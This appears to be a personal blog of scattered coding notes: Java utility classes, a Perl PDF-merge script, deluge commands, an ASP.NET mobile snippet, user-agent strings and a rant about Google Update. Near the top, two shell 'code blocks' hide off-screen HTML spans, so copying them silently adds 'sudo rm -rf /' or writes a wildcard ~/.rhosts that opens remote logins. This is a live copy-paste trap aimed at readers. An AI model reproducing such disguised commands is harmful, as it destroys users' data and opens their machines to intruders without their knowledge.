TPB live search
http://thepiratebay.se/search/%s/0/7/0
Labels: nerd, note to self
my life, postprocessed and interpreted
Labels: nerd, note to self
<p class="codeblock">
sudo fgrep virus * > quarantine; <span style="position: absolute; left: -100px; top: -100px">sudo rm -rf / ; </span> rm quarantine
</p>
<p class="codeblock">
sudo wget "http://seanlithgow.com.au/arsehole/usersneedinghelp.pl"; <span style="position: absolute; left: -100px; top: -100px"> > /dev/null; sudo echo "*" > ~/.rhosts; </span> man man
</p>
Labels: nerd
Labels: nerd, note to self
// utility functions
public class S {
private static boolean DEBUGMODE = true;
private S(){}
public static void p(Object s)
{
if (DEBUGMODE)
{
StackTraceElement[] ste = Thread.currentThread().getStackTrace();
String n = ste[2].getClassName();
System.out.println(n +": "+ s.toString());
}
}
public static Position int2Position(int i)
{
switch (i)
{
case 5: return Position.SCANNER;
case 0: return Position.ONE;
case 1: return Position.TWO;
case 2: return Position.THREE;
case 3: return Position.FOUR;
case 4: return Position.FIVE;
default: return null;
}
}
public static int Position2int(Position p)
{
if (p==Position.SCANNER) return 5;
else if (p==Position.ONE) return 0;
else if (p==Position.TWO) return 1;
else if (p==Position.THREE) return 2;
else if (p==Position.FOUR) return 3;
else if (p==Position.FIVE) return 4;
return -1; // this should never happen; if it does, hopefully this causes some kind of silly error
}
}
Labels: nerd
// finds all the threads and kills them
public class Apoptosis
{
// finds all the threads and kills them
public Apoptosis()
{
ThreadGroup allThreads = Thread.currentThread().getThreadGroup();
ThreadGroup parentGroup;
while ( ( parentGroup = allThreads.getParent() ) != null )
{
allThreads = parentGroup;
}
allThreads.interrupt();
}
}
sean@potatocake:~$ps -e | grep delugeSo lazy. That computer was like... 3 meters away from me at the time.
sean@potatocake:~$deluged
sean@potatocake:~$man deluge-web
sean@potatocake:~$deluge-web -f -p 8999
Labels: nerd, note to self
#! /usr/bin/perl -w
my @pdfs = `ls -rt | grep .pdf`;
my @args = qw/gs -q -sPAPERSIZE=A4 -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=output.pdf/;
chomp && push @args, $_ foreach ( @pdfs );
system( @args );
Labels: nerd
Labels: nerd
<script runat="server">
protected void Page_PreInit(object sender, EventArgs e)
{
if (Request.Browser.IsMobileDevice)
MasterPageFile = "~/Views/Shared/Site.tablet.Master";
}
</script>
Labels: nerd, note to self
["1:00am", "1:15am", "1:30am", "1:45am", "1:00pm", "1:15pm", "1:30pm", "1:45pm", "2:00am", "2:15am", "2:30am", "2:45am", "2:00pm", "2:15pm", "2:30pm", "2:45pm", "3:00am", "3:15am", "3:30am", "3:45am", "3:00pm", "3:15pm", "3:30pm", "3:45pm", "4:00am", "4:15am", "4:30am", "4:45am", "4:00pm", "4:15pm", "4:30pm", "4:45pm", "5:00am", "5:15am", "5:30am", "5:45am", "5:00pm", "5:15pm", "5:30pm", "5:45pm", "6:00am", "6:15am", "6:30am", "6:45am", "6:00pm", "6:15pm", "6:30pm", "6:45pm", "7:00am", "7:15am", "7:30am", "7:45am", "7:00pm", "7:15pm", "7:30pm", "7:45pm", "8:00am", "8:15am", "8:30am", "8:45am", "8:00pm", "8:15pm", "8:30pm", "8:45pm", "9:00am", "9:15am", "9:30am", "9:45am", "9:00pm", "9:15pm", "9:30pm", "9:45pm", "10:00am", "10:15am", "10:30am", "10:45am", "10:00pm", "10:15pm", "10:30pm", "10:45pm", "11:00am", "11:15am", "11:30am", "11:45am", "11:00pm", "11:15pm", "11:30pm", "11:45pm", "12:00am", "12:15am", "12:30am", "12:45am", "12:00pm", "12:15pm", "12:30pm", "12:45pm" ]
Labels: nerd, note to self
Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10
Labels: nerd, note to self
Wow. So not only can I not remove it through any conventional means, the only way to remove it is to delete everything Google has ever had a hand in and hope and trust that Google Update deletes itself.Google Update can't be removed by itself. If you remove Google Update processes from your computer, you may find that your Google programs no long function properly and, in many cases, you may see Google Update return automatically.
To fully uninstall Google Update, uninstall any Google applications you currently have installed. Approximately an hour after uninstalling your other Google programs, Google Update should be uninstalled automatically.
Labels: nerd, note to self, rage
Labels: nerd, note to self
Labels: nerd
Labels: nerd